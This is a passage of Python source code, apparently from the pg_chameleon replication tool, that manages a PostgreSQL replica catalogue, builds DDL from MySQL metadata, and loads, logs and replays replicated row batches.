v_table_name,
v_schema_name,
v_table_pkey,
t_binlog_name,
i_binlog_position
)
VALUES
(
%s,
%s,
%s,
ARRAY[%s],
%s,
%s
)
ON CONFLICT (i_id_source,v_table_name,v_schema_name)
DO UPDATE
SET
v_table_pkey=EXCLUDED.v_table_pkey,
t_binlog_name = EXCLUDED.t_binlog_name,
i_binlog_position = EXCLUDED.i_binlog_position
;
"""
self.pg_conn.pgsql_cur.execute(sql_insert, (
self.i_id_source,
table_name,
self.dest_schema,
index["index_columns"].strip(),
binlog_file,
binlog_pos
)
)
if table_no_pk:
self.logger.warning("Missing primary key. The table %s will not be replicated." % (table_name,))
sql_delete = """
DELETE FROM sch_chameleon.t_replica_tables
WHERE
i_id_source=%s
AND v_table_name=%s
AND v_schema_name=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_delete, (
self.i_id_source,
table_name,
self.dest_schema)
)
def unregister_table(self, table_name):
"""
This method is used when a table have the primary key dropped on MySQL.
The table name is removed from the replicatoin catalogue and the table is renamed.
This way any dependency (e.g. views, functions) to the table is preserved but the replica is stopped.
:param table_name: the table name to remove from t_replica_tables
"""
self.logger.info("unregistering table %s from the replica catalog" % (table_name,))
sql_delete=""" DELETE FROM sch_chameleon.t_replica_tables
WHERE
v_table_name=%s
AND v_schema_name=%s
RETURNING i_id_table
;
"""
self.pg_conn.pgsql_cur.execute(sql_delete, (table_name, self.dest_schema))
removed_id=self.pg_conn.pgsql_cur.fetchone()
table_id=removed_id[0]
self.logger.info("renaming table %s to %s_%s" % (table_name, table_name, table_id))
sql_rename="""ALTER TABLE IF EXISTS "%s"."%s" rename to "%s_%s"; """ % (self.dest_schema, table_name, table_name, table_id)
self.logger.debug(sql_rename)
self.pg_conn.pgsql_cur.execute(sql_rename)
def set_search_path(self):
"""
The method sets the search path for the connection.
"""
sql_path=" SET search_path=%s;" % (self.dest_schema, )
self.pg_conn.pgsql_cur.execute(sql_path)
def drop_tables(self):
"""
The method drops the tables present in the table_ddl
"""
self.set_search_path()
for table in self.table_ddl:
self.logger.debug("dropping table %s " % (table, ))
sql_drop = """DROP TABLE IF EXISTS "%s" CASCADE;""" % (table, )
self.pg_conn.pgsql_cur.execute(sql_drop)
def create_tables(self):
"""
The method loops trough the list table_ddl and executes the creation scripts.
No index is created in this method
"""
self.set_search_path()
for table in self.table_ddl:
self.logger.debug("creating table %s " % (table, ))
try:
ddl_enum=self.type_ddl[table]
for sql_type in ddl_enum:
self.pg_conn.pgsql_cur.execute(sql_type)
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(sql_type)
sql_create=self.table_ddl[table]
try:
self.pg_conn.pgsql_cur.execute(sql_create)
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(sql_create)
self.store_table(table)
def create_indices(self):
"""
The method creates the indices using the DDL stored in the class list self.idx_ddl.
"""
self.logger.info("creating the indices")
for table in self.idx_ddl:
idx_ddl= self.idx_ddl[table]
self.logger.debug("processing table %s" % (table, ))
for sql_idx in idx_ddl:
self.pg_conn.pgsql_cur.execute(sql_idx)
def copy_data(self, table, csv_file, my_tables={}):
"""
The method copy the data into postgresql using psycopg2's copy_expert.
The csv_file is a file like object which can be either a csv file or a string io object, accordingly with the
configuration parameter copy_mode.
:param table: the table name, used to get the table's metadata out of my_tables
:param csv_file: file like object with the table's data stored in CSV format
:param my_tables: table's metadata dictionary
"""
column_copy=[]
for column in my_tables[table]["columns"]:
column_copy.append('"'+column["column_name"]+'"')
sql_copy="COPY "+'"'+self.dest_schema+'"'+"."+'"'+table+'"'+" ("+','.join(column_copy)+") FROM STDIN WITH NULL 'NULL' CSV QUOTE '\"' DELIMITER',' ESCAPE '\"' ; "
self.pg_conn.pgsql_cur.copy_expert(sql_copy,csv_file)
def insert_data(self, table, insert_data, my_tables={}):
"""
The method is a fallback procedure for when the copy method fails.
The procedure performs a row by row insert, very slow but capable to skip the rows with problematic data (e.g. enchoding issues).
:param table: the table name, used to get the table's metadata out of my_tables
:param csv_file: file like object with the table's data stored in CSV format
:param my_tables: table's metadata dictionary
"""
column_copy=[]
column_marker=[]
for column in my_tables[table]["columns"]:
column_copy.append('"'+column["column_name"]+'"')
column_marker.append('%s')
sql_head="INSERT INTO "+'"'+self.dest_schema+'"'+"."+'"'+table+'"'+" ("+','.join(column_copy)+") VALUES ("+','.join(column_marker)+");"
for data_row in insert_data:
column_values=[]
for column in my_tables[table]["columns"]:
column_values.append(data_row[column["column_name"]])
try:
self.pg_conn.pgsql_cur.execute(sql_head,column_values)
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(self.pg_conn.pgsql_cur.mogrify(sql_head,column_values))
except:
self.logger.error("unexpected error when processing the row")
self.logger.error(" - > Table: %s" % table)
self.logger.error(" - > Insert list: %s" % (','.join(column_copy)) )
self.logger.error(" - > Insert values: %s" % (column_values) )
def build_idx_ddl(self):
"""
The method loops over the list l_pkeys and builds a new list with the statements for pkeys
"""
for table_name in self.table_metadata:
table=self.table_metadata[table_name]
table_name=table["name"]
indices=table["indices"]
table_idx=[]
for index in indices:
indx=index["index_name"]
index_columns=index["index_columns"]
non_unique=index["non_unique"]
if indx=='PRIMARY':
pkey_name="pk_"+table_name[0:20]+"_"+str(self.idx_sequence)
pkey_def='ALTER TABLE "'+table_name+'" ADD CONSTRAINT "'+pkey_name+'" PRIMARY KEY ('+index_columns+') ;'
table_idx.append(pkey_def)
else:
if non_unique==0:
unique_key='UNIQUE'
else:
unique_key=''
index_name='"idx_'+indx[0:20]+table_name[0:20]+"_"+str(self.idx_sequence)+'"'
idx_def='CREATE '+unique_key+' INDEX '+ index_name+' ON "'+table_name+'" ('+index_columns+');'
table_idx.append(idx_def)
self.idx_sequence+=1
self.idx_ddl[table_name]=table_idx
def build_tab_ddl(self):
"""
The method iterates over the list l_tables and builds a new list with the statements for tables
"""
if self.table_limit[0] != '*' :
table_metadata = {}
for tab in self.table_limit:
try:
table_metadata[tab] = self.table_metadata[tab]
except:
pass
else:
table_metadata = self.table_metadata
for table_name in table_metadata:
table=self.table_metadata[table_name]
columns=table["columns"]
ddl_head="CREATE TABLE "+'"'+table["name"]+'" ('
ddl_tail=");"
ddl_columns=[]
ddl_enum=[]
for column in columns:
if column["is_nullable"]=="NO":
col_is_null="NOT NULL"
else:
col_is_null="NULL"
column_type=self.type_dictionary[column["data_type"]]
if column_type=="enum":
enum_type="enum_"+table["name"]+"_"+column["column_name"]
sql_drop_enum='DROP TYPE IF EXISTS '+enum_type+' CASCADE;'
sql_create_enum="CREATE TYPE "+enum_type+" AS ENUM "+column["enum_list"]+";"
ddl_enum.append(sql_drop_enum)
ddl_enum.append(sql_create_enum)
column_type=enum_type
if column_type=="character varying" or column_type=="character":
column_type=column_type+"("+str(column["character_maximum_length"])+")"
if column_type=='numeric':
column_type=column_type+"("+str(column["numeric_precision"])+","+str(column["numeric_scale"])+")"
if column["extra"]=="auto_increment":
column_type="bigserial"
ddl_columns.append('"'+column["column_name"]+'" '+column_type+" "+col_is_null )
def_columns=str(',').join(ddl_columns)
self.type_ddl[table["name"]]=ddl_enum
self.table_ddl[table["name"]]=ddl_head+def_columns+ddl_tail
def get_schema_version(self):
"""
The method gets the service schema version querying the view sch_chameleon.v_version.
The try-except is used in order to get a valid value "base" if the view is missing.
This happens only if the schema upgrade is performed from very early pg_chamelon's versions.
"""
sql_check="""
SELECT
t_version
FROM
sch_chameleon.v_version
;
"""
try:
self.pg_conn.pgsql_cur.execute(sql_check)
value_check=self.pg_conn.pgsql_cur.fetchone()
cat_version=value_check[0]
except:
cat_version='base'
return cat_version
def upgrade_service_schema(self):
"""
The method upgrades the service schema to the latest version using the upgrade files if required.
The method uses the install_script flag to determine whether an upgrade file should be applied.
The variable cat_version stores the schema version. Each element in the class list cat_sql
stores the scripts in the upgrade directory along with the catalogue version associated with the install script.
If the current catalogue version stored in cat_version is equal to the script version the install is skipped but the variable
install_script is set to true. This way any following install script is executed to upgrade the catalogue to the higher version.
The hardcoded 0.7 version is required because that version introduced the multi source feature.
As initially the destination schema were not stored in the migration catalogue, the post migration update
is required to save this information in the replica catalogue.
"""
self.logger.info("Upgrading the service schema")
install_script=False
cat_version=self.get_schema_version()
for install in self.cat_sql:
script_ver=install["version"]
script_schema=install["script"]
self.logger.info("script schema %s, detected schema version %s - install_script:%s " % (script_ver, cat_version, install_script))
if install_script==True:
sql_view="""
CREATE OR REPLACE VIEW sch_chameleon.v_version
AS
SELECT %s::TEXT t_version
;"""
self.logger.info("Installing file version %s" % (script_ver, ))
file_schema=open(self.sql_dir+script_schema, 'rb')
sql_schema=file_schema.read()
file_schema.close()
self.pg_conn.pgsql_cur.execute(sql_schema)
self.pg_conn.pgsql_cur.execute(sql_view, (script_ver, ))
if script_ver=='0.7':
sql_update="""
UPDATE sch_chameleon.t_sources
SET
t_dest_schema=%s
WHERE i_id_source=(
SELECT
i_id_source
FROM
sch_chameleon.t_sources
WHERE
t_source='default'
AND t_dest_schema='default'
)
;
"""
self.pg_conn.pgsql_cur.execute(sql_update, (self.dest_schema, ))
if script_ver==cat_version and not install_script:
self.logger.info("enabling install script")
install_script=True
def check_service_schema(self):
"""
The method checks if the sch_chameleon exists
:return: count from information_schema.schemata
:rtype: integer
"""
sql_check="""
SELECT
count(*)
FROM
information_schema.schemata
WHERE
schema_name='sch_chameleon'
"""
self.pg_conn.pgsql_cur.execute(sql_check)
num_schema=self.pg_conn.pgsql_cur.fetchone()
return num_schema
def create_service_schema(self):
"""
The method installs the service replica service schema sch_chameleon.
"""
num_schema=self.check_service_schema()
if num_schema[0]==0:
for install in self.cat_sql:
script_ver=install["version"]
script_schema=install["script"]
if script_ver=='base':
self.logger.info("Installing service schema %s" % (script_ver, ))
file_schema=open(self.sql_dir+script_schema, 'rb')
sql_schema=file_schema.read()
file_schema.close()
self.pg_conn.pgsql_cur.execute(sql_schema)
else:
self.logger.error("The service schema is already created")
def get_status(self):
"""
The metod lists the sources with the running status and the eventual lag
:return: psycopg2 fetchall results
:rtype: psycopg2 tuple
"""
sql_status="""
SELECT
t_source,
t_dest_schema,
enm_status,
date_trunc('seconds',now())-ts_last_received lag,
ts_last_received,
ts_last_received-ts_last_replay,
ts_last_replay
FROM
sch_chameleon.t_sources
ORDER BY
t_source
;
"""
self.pg_conn.pgsql_cur.execute(sql_status)
results = self.pg_conn.pgsql_cur.fetchall()
return results
def drop_service_schema(self):
"""
The method removes the service schema discarding all the replica references.
The replicated tables are kept in place though.
"""
file_schema=open(self.sql_dir+"drop_schema.sql", 'rb')
sql_schema=file_schema.read()
file_schema.close()
self.pg_conn.pgsql_cur.execute(sql_schema)
def save_master_status(self, master_status, cleanup=False):
"""
This method saves the master data determining which log table should be used in the next batch.
The method performs also a cleanup for the logged events the cleanup parameter is true.
:param master_status: the master data with the binlogfile and the log position
:param cleanup: if true cleans the not replayed batches. This is useful when resyncing a replica.
"""
next_batch_id=None
master_data = master_status[0]
binlog_name = master_data["File"]
binlog_position = master_data["Position"]
try:
event_time = master_data["Time"]
except:
event_time = None
sql_master="""
INSERT INTO sch_chameleon.t_replica_batch
(
i_id_source,
t_binlog_name,
i_binlog_position
)
VALUES
(
%s,
%s,
%s
)
RETURNING i_id_batch
;
"""
sql_event="""
UPDATE sch_chameleon.t_sources
SET
ts_last_received=to_timestamp(%s),
v_log_table=ARRAY[v_log_table[2],v_log_table[1]]
WHERE
i_id_source=%s
RETURNING
v_log_table[1],
ts_last_received
;
"""
try:
if cleanup:
self.logger.info("cleaning not replayed batches for source %s", self.i_id_source)
sql_cleanup=""" DELETE FROM sch_chameleon.t_replica_batch WHERE i_id_source=%s AND NOT b_replayed; """
self.pg_conn.pgsql_cur.execute(sql_cleanup, (self.i_id_source, ))
self.pg_conn.pgsql_cur.execute(sql_master, (self.i_id_source, binlog_name, binlog_position))
results=self.pg_conn.pgsql_cur.fetchone()
next_batch_id=results[0]
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(self.pg_conn.pgsql_cur.mogrify(sql_master, (self.i_id_source, binlog_name, binlog_position)))
try:
self.pg_conn.pgsql_cur.execute(sql_event, (event_time, self.i_id_source, ))
results = self.pg_conn.pgsql_cur.fetchone()
log_table_name = results[0]
db_event_time = results[1]
self.logger.info("Saved master data for source: %s" %(self.source_name, ) )
self.logger.debug("Binlog file: %s" % (binlog_name, ))
self.logger.debug("Binlog position:%s" % (binlog_position, ))
self.logger.debug("Last event: %s" % (db_event_time, ))
self.logger.debug("Next log table name: %s" % ( log_table_name, ))
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.pg_conn.pgsql_cur.mogrify(sql_event, (event_time, self.i_id_source, ))
return next_batch_id
def get_batch_data(self):
"""
The method updates the batch status to started for the given source_id and returns the
batch informations.
:return: psycopg2 fetchall results without any manipulation
:rtype: psycopg2 tuple
"""
sql_batch="""
WITH t_created AS
(
SELECT
max(ts_created) AS ts_created
FROM
sch_chameleon.t_replica_batch
WHERE
NOT b_processed
AND NOT b_replayed
AND i_id_source=%s
)
UPDATE sch_chameleon.t_replica_batch
SET
b_started=True
FROM
t_created
WHERE
t_replica_batch.ts_created=t_created.ts_created
AND i_id_source=%s
RETURNING
i_id_batch,
t_binlog_name,
i_binlog_position,
(SELECT v_log_table[1] from sch_chameleon.t_sources WHERE i_id_source=%s) as v_log_table
;
"""
self.pg_conn.pgsql_cur.execute(sql_batch, (self.i_id_source, self.i_id_source, self.i_id_source, ))
return self.pg_conn.pgsql_cur.fetchall()
def insert_batch(self,group_insert):
"""
Fallback method for the batch insert. Each row event is processed
individually and any problematic row is discarded into the table t_discarded_rows.
The row is encoded in base64 in order to prevent any encoding or type issue.
:param group_insert: the event data built in mysql_engine
"""
self.logger.debug("starting insert loop")
for row_data in group_insert:
global_data = row_data["global_data"]
event_data = row_data["event_data"]
event_update = row_data["event_update"]
log_table = global_data["log_table"]
event_time = global_data["event_time"]
sql_insert="""
INSERT INTO sch_chameleon."""+log_table+"""
(
i_id_batch,
v_table_name,
v_schema_name,
enm_binlog_event,
t_binlog_name,
i_binlog_position,
jsb_event_data,
jsb_event_update,
i_my_event_time
)
VALUES
(
%s,
%s,
%s,
%s,
%s,
%s,
%s,
%s,
%s
)
;
"""
try:
self.pg_conn.pgsql_cur.execute(sql_insert,(
global_data["batch_id"],
global_data["table"],
global_data["schema"],
global_data["action"],
global_data["binlog"],
global_data["logpos"],
json.dumps(event_data, cls=pg_encoder),
json.dumps(event_update, cls=pg_encoder),
event_time
)
)
except:
self.logger.error("error when storing event data. saving the discarded row")
self.save_discarded_row(row_data,global_data["batch_id"])
def save_discarded_row(self,row_data,batch_id):
"""
The method saves the discarded row in the table t_discarded_row along with the id_batch.
The row is encoded in base64 as the t_row_data is a text field.
:param row_data: the row data dictionary
:param batch_id: the id batch where the row belongs
"""
b64_row=base64.b64encode(str(row_data))
sql_save="""
INSERT INTO sch_chameleon.t_discarded_rows
(
i_id_batch,
t_row_data
)
VALUES
(
%s,
%s
);
"""
self.pg_conn.pgsql_cur.execute(sql_save,(batch_id,b64_row))
def write_batch(self, group_insert):
"""
Main method for adding the batch data in the log tables.
The row data from group_insert are mogrified in CSV format and stored in
the string like object csv_file.
psycopg2's copy expert is used to store the event data in PostgreSQL.
Should any error occur the procedure fallsback to insert_batch.
:param group_insert: the event data built in mysql_engine
"""
csv_file=io.StringIO()
self.set_application_name("writing batch")
insert_list=[]
for row_data in group_insert:
global_data=row_data["global_data"]
event_data=row_data["event_data"]
event_update=row_data["event_update"]
log_table=global_data["log_table"]
insert_list.append(self.pg_conn.pgsql_cur.mogrify("%s,%s,%s,%s,%s,%s,%s,%s,%s" , (
global_data["batch_id"],
global_data["table"],
self.dest_schema,
global_data["action"],
global_data["binlog"],
global_data["logpos"],
json.dumps(event_data, cls=pg_encoder),
json.dumps(event_update, cls=pg_encoder),
global_data["event_time"],
)
)
)
csv_data=b"\n".join(insert_list ).decode()
csv_file.write(csv_data)
csv_file.seek(0)
try:
sql_copy="""
COPY "sch_chameleon"."""+log_table+"""
(
i_id_batch,
v_table_name,
v_schema_name,
enm_binlog_event,
t_binlog_name,
i_binlog_position,
jsb_event_data,
jsb_event_update,
i_my_event_time
)
FROM
STDIN
WITH NULL 'NULL'
CSV QUOTE ''''
DELIMITER ','
ESCAPE ''''
;
"""
self.pg_conn.pgsql_cur.copy_expert(sql_copy,csv_file)
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(csv_data)
self.logger.error("fallback to inserts")
self.insert_batch(group_insert)
def set_batch_processed(self, id_batch):
"""
The method updates the flag b_processed and sets the processed timestamp for the given batch id.
The event ids are aggregated into the table t_batch_events used by the replay function.
:param id_batch: the id batch to set as processed
"""
self.logger.debug("updating batch %s to processed" % (id_batch, ))
sql_update="""
UPDATE sch_chameleon.t_replica_batch
SET
b_processed=True,
ts_processed=now()
WHERE
i_id_batch=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_update, (id_batch, ))
self.logger.debug("collecting events id for batch %s " % (id_batch, ))
sql_collect_events = """
INSERT INTO
sch_chameleon.t_batch_events
(
i_id_batch,
i_id_event
)
SELECT
i_id_batch,
array_agg(i_id_event)
FROM
(
SELECT
i_id_batch,
i_id_event,
ts_event_datetime
FROM
sch_chameleon.t_log_replica
WHERE i_id_batch=%s
ORDER BY ts_event_datetime
) t_event
GROUP BY
i_id_batch
;
"""
self.pg_conn.pgsql_cur.execute(sql_collect_events, (id_batch, ))
def process_batch(self, replica_batch_size):
"""
The method calls the function fn_process_batch with the parameters batch size and the id_source.
The plpgsql function returns true if there are still rows to process. When all rows are replayed
the method exits.
:param replica_batch_size: the max rows to process in a single function call.
"""
self.set_application_name("replay batch")
batch_loop=True
sql_process="""SELECT sch_chameleon.fn_process_batch(%s,%s);"""
self.logger.info("Replaying batch for source %s replay size %s rows" % ( self.source_name, replica_batch_size))
while batch_loop:
self.pg_conn.pgsql_cur.execute(sql_process, (replica_batch_size, self.i_id_source))
batch_result=self.pg_conn.pgsql_cur.fetchone()
batch_loop=batch_result[0]
if batch_loop:
self.logger.info("Still working on batch for source %s replay size %s rows" % (self.source_name, replica_batch_size ))
else:
self.logger.info("Batch replay for source %s is complete" % (self.source_name))
self.logger.debug("Cleanup for replayed batches older than %s for source %s" % (self.batch_retention, self.source_name))
sql_cleanup="""
DELETE FROM
sch_chameleon.t_replica_batch
WHERE
b_started
AND b_processed
AND b_replayed
AND now()-ts_replayed>%s::interval
AND i_id_source=%s
;
"""
self.set_application_name("cleanup old batches")
self.pg_conn.pgsql_cur.execute(sql_cleanup, (self.batch_retention, self.i_id_source ))
self.set_application_name("idle")
def add_foreign_keys(self, source_name, fk_metadata):
"""
the method creates the foreign keys extracted from the mysql catalog
the keys are created initially as invalid then validated. If an error happens
is displayed on the log destination
:param source_name: the source name, required to determine the destination schema
:param fk_metadata: the foreign keys metadata extracted from mysql's information schema
"""
fk_list = []
sql_schema="""
SELECT
t_dest_schema
FROM
sch_chameleon.t_sources
WHERE
t_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_schema, (source_name, ))
dschema=self.pg_conn.pgsql_cur.fetchone()
destination_schema = dschema[0]
self.logger.info("creating the not validated foreign keys in schema %s" % destination_schema)
fk_counter = 0
for foreign_key in fk_metadata:
table_name = foreign_key["table_name"]
fk_name = foreign_key["constraint_name"][0:20] + "_" + str(fk_counter)
fk_cols = foreign_key["fk_cols"]
referenced_table_name = foreign_key["referenced_table_name"]
ref_columns = foreign_key["ref_columns"]
fk_list.append({'fkey_name':fk_name, 'table_name':table_name})
sql_fkey = ("""ALTER TABLE "%s"."%s" ADD CONSTRAINT "%s" FOREIGN KEY (%s) REFERENCES "%s"."%s" (%s) NOT VALID;""" %
(
destination_schema,
table_name,
fk_name,
fk_cols,
destination_schema,
referenced_table_name,
ref_columns
)
)
fk_counter+=1
self.logger.debug("creating %s on %s" % (fk_name, table_name))
try:
self.pg_conn.pgsql_cur.execute(sql_fkey)
except psycopg2.Error as e:
self.logger.error("could not create the foreign key %s on table %s" % (fk_name, table_name))
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error("STATEMENT: %s " % (self.pg_conn.pgsql_cur.mogrify(sql_fkey)))
self.logger.info("validating the foreign keys in schema %s" % destination_schema)
for fkey in fk_list:
sql_validate = 'ALTER TABLE "%s"."%s" VALIDATE CONSTRAINT "%s";' % (destination_schema, fkey["table_name"], fkey["fkey_name"])
try:
self.pg_conn.pgsql_cur.execute(sql_validate)
except psycopg2.Error as e:
self.logger.error("could not validate the foreign key %s on table %s" % (fkey["table_name"], fkey["fkey_name"]))
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error("STATEMENT: %s " % (self.pg_conn.pgsql_cur.mogrify(sql_validate)))
def reset_sequences(self, source_name):
"""
the method resets the sequences to the max value available the associated table
:param source_name: the source name, required to determine the destination schema
"""
sql_schema="""
SELECT
t_dest_schema
FROM
sch_chameleon.t_sources
WHERE
t_source=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_schema, (source_name, ))
dschema=self.pg_conn.pgsql_cur.fetchone()
destination_schema = dschema[0]
self.logger.info("resetting the sequences in schema %s" % destination_schema)
sql_gen_reset="""
SELECT
format('SELECT setval(%%L::regclass,(select max(%%I) FROM %%I.%%I));',
replace(replace(column_default,'nextval(''',''),'''::regclass)',''),
column_name,
table_schema,
table_name
),
replace(replace(column_default,'nextval(''',''),'''::regclass)','') as seq_name
FROM
information_schema.columns
WHERE
table_schema=%s
AND column_default like 'nextval%%'
;"""
self.pg_conn.pgsql_cur.execute(sql_gen_reset, (destination_schema, ))
results=self.pg_conn.pgsql_cur.fetchall()
try:
for statement in results:
self.logger.info("resetting the sequence %s" % statement[1])
self.pg_conn.pgsql_cur.execute(statement[0])
except psycopg2.Error as e:
self.logger.error("SQLCODE: %s SQLERROR: %s" % (e.pgcode, e.pgerror))
self.logger.error(statement)
except:
pass
def generate_default_statements(self, table, column, create_column=None):
"""
The method gets the default value associated with the table and column removing the cast.
:param table: The table name
:param table: The column name
:return: the statements for dropping and creating default value on the affected table
:rtype: dictionary
"""
if not create_column:
create_column = column
regclass = """ "%s"."%s" """ %(self.dest_schema, table)
sql_def_val = """
SELECT
(
SELECT
split_part(substring(pg_catalog.pg_get_expr(d.adbin, d.adrelid) for 128),'::',1)
FROM
pg_catalog.pg_attrdef d
WHERE
d.adrelid = a.attrelid
AND d.adnum = a.attnum
AND a.atthasdef
) as default_value
FROM
pg_catalog.pg_attribute a
WHERE
a.attrelid = %s::regclass
AND a.attname=%s
AND NOT a.attisdropped
;
"""
self.pg_conn.pgsql_cur.execute(sql_def_val, (regclass, column ))
default_value = self.pg_conn.pgsql_cur.fetchone()
if default_value[0]:
query_drop_default = """ ALTER TABLE "%s" ALTER COLUMN "%s" DROP DEFAULT;""" % (table, column)
query_add_default = """ ALTER TABLE "%s" ALTER COLUMN "%s" SET DEFAULT %s ; """ % (table, create_column, default_value[0])
else:
query_drop_default = ""
query_add_default = ""
return {'drop':query_drop_default, 'create':query_add_default}
def build_enum_ddl(self, enm_dic):
"""
The method builds the enum DDL using the token data.
The postgresql system catalog is queried to determine whether the enum exists and needs to be altered.
The alter is not written in the replica log table but executed as single statement as PostgreSQL do not allow the alter being part of a multi command
SQL.
:param enm_dic: a dictionary with the enumeration details
:return: a dictionary with the pre_alter and post_alter statements (e.g. pre alter create type , post alter drop type)
:rtype: dictionary
"""
#enm_dic = {'table':table_name, 'column':column_name, 'type':column_type, 'enum_list': enum_list}
enum_name="enum_%s_%s" % (enm_dic['table'], enm_dic['column'])
sql_check_enum = """
SELECT
typ.typcategory,
typ.typname,
sch_typ.nspname as typschema,
CASE
WHEN typ.typcategory='E'
THEN
(
SELECT
array_agg(enumlabel)
FROM
pg_enum
WHERE
enumtypid=typ.oid
)
END enum_list
FROM
pg_type typ
INNER JOIN pg_namespace sch_typ
ON sch_typ.oid = typ.typnamespace
WHERE
sch_typ.nspname=%s
AND typ.typname=%s
;
"""
self.pg_conn.pgsql_cur.execute(sql_check_enum, (self.dest_schema, enum_name))
type_data=self.pg_conn.pgsql_cur.fetchone()
return_dic = {}
pre_alter = ""
post_alter = ""
column_type = enm_dic["type"]
self.logger.debug(enm_dic)
if type_data:
if type_data[0] == 'E' and enm_dic["type"] == 'enum':
self.logger.debug('There is already the enum %s, altering the type')
new_enums = [val.strip() for val in enm_dic["enum_list"] if val.strip() not in type_data[3]]
sql_add = []
for enumeration in new_enums:
sql_add = """ALTER TYPE "%s"."%s" ADD VALUE '%s';""" % (type_data[2], enum_name, enumeration)
self.pg_conn.pgsql_cur.execute(sql_add)
column_type = enum_name
elif type_data[0] != 'E' and enm_dic["type"] == 'enum':
self.logger.debug('The column will be altered in enum, creating the type')
pre_alter = "CREATE TYPE \"%s\" AS ENUM (%s);" % (enum_name, enm_dic["enum_elements"])
column_type = enum_name
elif type_data[0] == 'E' and enm_dic["type"] != 'enum':
self.logger.debug('The column is no longer an enum, dropping the type')
post_alter = "DROP TYPE \"%s\" " % (enum_name)
elif not type_data and enm_dic["type"] == 'enum':
self.logger.debug('Creating a new enumeration type %s' % (enum_name))
pre_alter = "CREATE TYPE \"%s\" AS ENUM (%s);" % (enum_name, enm_dic["enum_elements"])
column_type = enum_name
return_dic["column_type"] = column_type
return_dic["pre_alter"] = pre_alter
return_dic["post_alter"] = post_alter
return return_dic
def build_alter_table(self, token):
"""
The method builds the alter table statement from the token data.
The function currently supports the following statements.
DROP TABLE
ADD COLUMN
CHANGE
MODIFY
The change and modify are potential source of breakage for the replica because of
the mysql implicit fallback data types.
For better understanding please have a look to
http://www.cybertec.at/why-favor-postgresql-over-mariadb-mysql/
:param token: A dictionary with the tokenised sql statement
:return: query the DDL query in the PostgreSQL dialect
:rtype: string
"""
alter_cmd = []
ddl_enum = []
ddl_pre_alter = []
ddl_post_alter = []
query_cmd=token["command"]
table_name=token["name"]
for alter_dic in token["alter_cmd"]:
if alter_dic["command"] == 'DROP':
alter_cmd.append("%(command)s %(name)s CASCADE" % alter_dic)
elif alter_dic["command"] == 'ADD':
column_type = self.type_dictionary[alter_dic["type"]]
column_name = alter_dic["name"]
enum_list = str(alter_dic["dimension"]).replace("'", "").split(",")
enm_dic = {'table':table_name, 'column':column_name, 'type':column_type, 'enum_list': enum_list, 'enum_elements':alter_dic["dimension"]}
enm_alter = self.build_enum_ddl(enm_dic)
ddl_pre_alter.append(enm_alter["pre_alter"])
ddl_post_alter.append(enm_alter["post_alter"])
column_type= enm_alter["column_type"]
if column_type in ["character varying", "character", 'numeric', 'bit', 'float']:
column_type=column_type+"("+str(alter_dic["dimension"])+")"
if alter_dic["default"]:
default_value = "DEFAULT %s" % alter_dic["default"]
else:
default_value=""
alter_cmd.append("%s \"%s\" %s NULL %s" % (alter_dic["command"], column_name, column_type, default_value))
elif alter_dic["command"] == 'CHANGE':
sql_rename = ""
sql_type = ""
old_column=alter_dic["old"]
new_column=alter_dic["new"]
column_name = old_column
enum_list = str(alter_dic["dimension"]).replace("'", "").split(",")
column_type=self.type_dictionary[alter_dic["type"]]
default_sql = self.generate_default_statements(table_name, old_column, new_column)
enm_dic = {'table':table_name, 'column':column_name, 'type':column_type, 'enum_list': enum_list, 'enum_elements':alter_dic["dimension"]}
enm_alter = self.build_enum_ddl(enm_dic)
ddl_pre_alter.append(enm_alter["pre_alter"])
ddl_pre_alter.append(default_sql["drop"])
ddl_post_alter.append(enm_alter["post_alter"])
ddl_post_alter.append(default_sql["create"])
column_type= enm_alter["column_type"]
if column_type=="character varying" or column_type=="character" or column_type=='numeric' or column_type=='bit' or column_type=='float':
column_type=column_type+"("+str(alter_dic["dimension"])+")"
sql_type = """ALTER TABLE "%s" ALTER COLUMN "%s" SET DATA TYPE %s USING "%s"::%s ;;""" % (table_name, old_column, column_type, old_column, column_type)
if old_column != new_column:
sql_rename="""ALTER TABLE "%s" RENAME COLUMN "%s" TO "%s" ;""" % (table_name, old_column, new_column)
query = ' '.join(ddl_pre_alter)
query += sql_type+sql_rename
query += ' '.join(ddl_post_alter)
return query
elif alter_dic["command"] == 'MODIFY':
column_type = self.type_dictionary[alter_dic["type"]]
column_name = alter_dic["name"]
enum_list = str(alter_dic["dimension"]).replace("'", "").split(",")
default_sql = self.generate_default_statements(table_name, column_name)
enm_dic = {'table':table_name, 'column':column_name, 'type':column_type, 'enum_list': enum_list, 'enum_elements':alter_dic["dimension"]}
enm_alter = self.build_enum_ddl(enm_dic)
ddl_pre_alter.append(enm_alter["pre_alter"])
ddl_pre_alter.append(default_sql["drop"])
ddl_post_alter.append(enm_alter["post_alter"])
ddl_post_alter.append(default_sql["create"])
column_type= enm_alter["column_type"]
if column_type=="character varying" or column_type=="character" or column_type=='numeric' or column_type=='bit' or column_type=='float':
column_type=column_type+"("+str(alter_dic["dimension"])+")"
query = ' '.join(ddl_pre_alter)
query += """ALTER TABLE "%s" ALTER COLUMN "%s" SET DATA TYPE %s USING "%s"::%s ;""" % (table_name, column_name, column_type, column_name, column_type)
query += ' '.join(ddl_post_alter)
return query
query = ' '.join(ddl_pre_alter)
query += query_cmd + ' '+ table_name+ ' ' +', '.join(alter_cmd)+" ;"
query += ' '.join(ddl_post_alter)
return query
def truncate_tables(self):
"""
The method truncate the tables listed in t_index_def. In order to minimise the risk of lock chain
